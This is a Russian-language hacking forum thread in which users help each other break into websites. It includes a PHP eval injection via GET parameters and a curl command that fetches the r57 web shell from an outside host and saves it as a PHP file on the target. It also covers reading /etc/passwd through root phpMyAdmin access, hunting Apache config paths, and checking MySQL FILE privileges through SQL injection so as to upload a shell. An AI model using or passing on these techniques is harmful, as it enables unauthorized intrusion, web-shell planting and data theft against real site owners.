набудующее от кавычек stripslashes ,eval(stripslashes($_GET[e])) а в твое случае попробуй имятвоего_скрипта.php?e=eval(stripslashes($_GET[a]))&a=ну и тут твой код с кавычками
Перекодирует браузер, нужно использовать тулзу, которая отправляет сырой запрос, в простейшем случае - telnet, много инструментов более удобных. Не трудно отправить курлом. На форуме была программа.
собственно записал в фак комплит eval(stripslashes($_GET[e])); но чето всёравно не получается( вот какой код использую Code: e=system('curl http://www.sh3ll.org/r57.txt > 23.php');
Пару вопросов, сижу в phpmyadmin с правами рут где в настройках изменить max_allowed_packet и второй вопрос, в пвпке etc/passwd нашол нужного мне узверя bla-user:x:500:505:bla-user:/var/www/bla-user/data:/bin/date\ каким будет полный путь к файлам исходя из етого?
"max_allowed_packet" менять надо в my.ini второй вопрос не правильно составил, что это за юзер? и что означает полный путь к файлам? и к каким файлам?
ты уверен что там apache вообще? смотри какая система стоит (@@version_compile_os, или по баннерам сервера) дальше ищи в гугле, где в данной системе конфиги хранятся
проверил, система линукс нашол под неё конфиги http://microsin.ru/content/view/542/1/ подобного http.conf я ненашол, или я плохо искал?
qaz, в разных дистрибутивах конфиги хранятся в разных каталогах. на эту тему можно флудить на 100 страниц, читайте и практикуйтесь.
https://forum.antichat.ru/thread49775.html http://wiki.apache.org/httpd/DistrosDefaultLayout ищи логи в них тоже могут быть пути....какая верси пхпмуадмина? может там есть баги на раскрытие путей
Доброй ночи, ачат. Есть одна скуля. Есть полный доступ к структуре БД information_schema уязвимого ресурса. Как узнать аналог file_priv если мы говорим об information_schema? Погуглив, увидел приблизительный ответ на свой вопрос. select grantee from information_schema.user_privileges where privilege_type='FILE' and is_grantable='YES' Но что делать, если в таблице user_privileges вообще нет поля 'FILE'? Каким еще тестовым запросом можно определить свои права для работы с файлами? Означает ли отсутствие 'FILE' как отсутствие каких-либо прав с работой над файлами вообще? Сильно не смейтесь, это не мой профиль, просто попросили помочь :3
select file_priv from mysql.user или что тебе конкретно нужно, ты опиши ты хочешь узнать права юзвера мускула? тогда запрос я тебе написал, или что тебе нужно?
Спасибо за ответ. БД "mysql" отсутствует вообще. Есть только information_schema. Да, мне нужно узнать, существует ли возможность узнать аналог select file_priv from mysql.user для information_schema. Как-то так, в общем.
если коротко то, нету доступа к базе mysql - нету прав на чтение/запись файлов. в information_schema не хранится информация о правах, так что не ищи дальше.
Да, именно. Пока что, исходя из тех данных, к которым я имею доступ, хочу попытаться в первую очередь попробовать залить шелл. Вот я и пытаюсь узнать свои права. Но не знаю как определить в information_schema свои права при условии отсутствия поля "FILE" в таблице USER_PRIVILEGES.
Ясно, понял. Учту на будущее. Спасибо. И, безусловно, жаль, что дело принимает такой оборот. Ладно, попробуем поискать обходные пути.
